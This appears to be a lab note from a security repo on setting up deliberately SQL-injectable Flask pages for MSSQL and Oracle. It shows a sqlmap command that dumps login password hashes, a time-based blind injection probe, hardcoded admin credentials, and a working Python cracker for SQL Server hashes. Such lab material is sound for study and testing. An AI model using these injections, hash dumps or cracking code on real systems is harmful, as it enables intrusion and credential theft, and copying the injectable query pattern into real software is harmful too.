Link: https://github.com/dhgdhg/DVWA-Note

  • Install MSSQL with Docker on Windows to build the test environment
    • https://www.cnblogs.com/edhg/p/11530901.html
    • Write the MSSQL test page (deliberately injectable: the id parameter is concatenated straight into the query)
        import pymssql
        from flask import Flask, request

        app = Flask(__name__)

        @app.route('/')
        def index():
            # Connects as sa on purpose so later queries against master.sys.sql_logins succeed.
            conn = pymssql.connect(host='127.0.0.1', user='sa', password='Pass@Word1', database='test')
            cursor = conn.cursor()
            my_id = request.args.get('id', '')
            # Intentionally vulnerable: id is string-concatenated, not bound as a parameter.
            my_sql = "select * from test_t where id=" + my_id + " and name='name1'"
            # The raw SQL is echoed back so the injected statement can be seen while testing.
            result_txt = my_sql + '<br><br><br>'
            try:
                cursor.execute(my_sql)
                row = cursor.fetchone()
                # row is None when nothing matched; the resulting TypeError is shown like any SQL error below.
                result_txt += "ID: {}<br>Name: {}".format(row[0], row[1])
            except Exception as e:
                # Error messages go straight to the page, which is what makes error-based injection easy.
                result_txt += str(e)
            finally:
                cursor.close()
                conn.close()
            return result_txt

        if __name__ == '__main__':
            app.run()
    • Create the test table test_t and insert a few rows
    • Dump the login name / password hash table with sqlmap
      • Capture the request with Burp Suite and save it as rr.txt
        • Example (the § characters are Burp Intruder payload markers; delete them before handing the file to sqlmap, which marks a custom injection point with * instead):
            GET /?id=§1%20order%20by%203--+§ HTTP/1.1
            Host: 127.0.0.1:5000
            Accept: */*
            Accept-Language: en
            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
            Connection: close
      • Run sqlmap to dump login names and password hashes (fn_sqlvarbasetostr turns the varbinary hash into a 0x... hex string that cracking tools accept; reading password_hash from sys.sql_logins works here because the page connects as sa)
        • sqlmap -r rr.txt --sql-query="select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins"
      • Crack the dumped hashes with johnny (the John the Ripper GUI) and a wordlist; 0x0200... hashes are the SQL Server 2012+ format (john --format=mssql12), 0x0100... the 2005-2008 format (mssql05)
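To make the last step concrete, here is an added example (not code from the DVWA-Note repo) that parses the 0x0100.../0x0200... strings sqlmap dumps, recomputes the SQL Server login hash for each wordlist entry and reports hits. The sample dump, its logins, salts and passwords are all constructed in the block; the hash layout (2-byte version, 4-byte salt, SHA-1 or SHA-512 over the UTF-16LE password followed by the salt) is the real SQL Server scheme, which is also what john's mssql05/mssql12 formats implement.

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional, Tuple

# Layout of master.sys.sql_logins.password_hash (what fn_sqlvarbasetostr prints as 0x...):
#   0x0100 | 4-byte salt | SHA-1  ( UTF-16LE(password) || salt )   SQL Server 2005 - 2008 R2
#   0x0200 | 4-byte salt | SHA-512( UTF-16LE(password) || salt )   SQL Server 2012 and later
DIGEST_BY_VERSION = {0x0100: "sha1", 0x0200: "sha512"}


def parse_hash(hex_hash: str) -> Tuple[int, bytes, bytes]:
    """Split a dumped hash string into (version, salt, digest), rejecting malformed input."""
    raw = bytes.fromhex(hex_hash[2:] if hex_hash[:2].lower() == "0x" else hex_hash)
    version = int.from_bytes(raw[:2], "big")
    if version not in DIGEST_BY_VERSION:
        raise ValueError("unsupported hash version 0x%04x" % version)
    salt, digest = raw[2:6], raw[6:]
    want = hashlib.new(DIGEST_BY_VERSION[version]).digest_size
    if len(salt) != 4 or len(digest) != want:
        raise ValueError("truncated hash: expected %d digest bytes, got %d" % (want, len(digest)))
    return version, salt, digest


def compute_digest(password: str, salt: bytes, version: int) -> bytes:
    """SQL Server hashes the UTF-16LE password with the salt appended (not prepended)."""
    return hashlib.new(DIGEST_BY_VERSION[version], password.encode("utf-16-le") + salt).digest()


def make_hash(password: str, salt: bytes, version: int = 0x0200) -> str:
    """Build a hash in the dumped 0x... form. Used only to construct sample data offline."""
    return "0x" + (version.to_bytes(2, "big") + salt + compute_digest(password, salt, version)).hex()


def check_password(password: str, hex_hash: str) -> bool:
    """True if password reproduces the digest stored in hex_hash."""
    version, salt, digest = parse_hash(hex_hash)
    return hmac.compare_digest(compute_digest(password, salt, version), digest)


def crack_dump(dump: Iterable[Tuple[str, str]], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Try every wordlist entry against every (login, hash) pair; None means no hit."""
    words = list(wordlist)
    found: Dict[str, Optional[str]] = {}
    for login, hex_hash in dump:
        found[login] = next((w for w in words if check_password(w, hex_hash)), None)
    return found


# Constructed sample dump (assumed logins, salts and passwords, not data from the page).
SAMPLE_DUMP = [
    ("sa", make_hash("Pass@Word1", bytes.fromhex("deadbeef"))),                 # 2012+ style hash
    ("report_ro", make_hash("Summer2019", bytes.fromhex("01020304"), 0x0100)),  # 2005 style hash
    ("svc_backup", make_hash("not-in-wordlist", bytes.fromhex("cafebabe"))),
]
SAMPLE_WORDLIST = ["password", "Summer2019", "Pass@Word1", "sa"]

if __name__ == "__main__":
    for login, pw in crack_dump(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print(login, "->", pw if pw is not None else "(no hit)")
```

A real dump is fed in the same shape, one (name, 0x...) pair per line from sqlmap's output; the version check matters because a 0x0100 hash tried with SHA-512 never matches and would silently look like a wordlist miss.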
  • Install Oracle with Docker on Windows to build the test environment
    • https://www.cnblogs.com/edhg/p/11531475.html
    • Write the Oracle test page (same deliberate injection: EMPNO comes straight from the id parameter)
        import cx_Oracle
        from flask import Flask, request

        app = Flask(__name__)

        @app.route('/')
        def index():
            my_id = request.args.get('id', '')
            # Intentionally vulnerable: id is string-concatenated. EMPNO 7369 is SMITH in the sample SCOTT schema.
            my_sql = "SELECT * FROM SCOTT.EMP WHERE EMPNO=" + my_id + " and ENAME='SMITH'"
            result_txt = my_sql + '<br><br><br>'
            conn = None
            cursor = None
            try:
                dsn = cx_Oracle.makedsn(host='127.0.0.1', port=1521, sid='helowin')
                conn = cx_Oracle.connect(user='system', password='passwd', dsn=dsn)
                cursor = conn.cursor()
                cursor.execute(my_sql)
                row = cursor.fetchone()
                result_txt += "ID: {}<br>Name: {}".format(row[0], row[1])
            except Exception as e:
                result_txt += str(e)
            finally:
                # Only close what was actually opened; a failed connect left these as None.
                if cursor is not None:
                    cursor.close()
                if conn is not None:
                    conn.close()
            return result_txt

        if __name__ == '__main__':
            app.run()
    • and 1=(DBMS_PIPE.RECEIVE_MESSAGE(1, 10))
      • Delays 10 seconds: RECEIVE_MESSAGE waits up to 10 s for a message on pipe '1' (the first argument is the pipe name, implicitly converted from the number) that never arrives, then returns the timeout code 1, so the comparison becomes true only after the delay. Appended to ?id= this gives a time-based blind injection probe.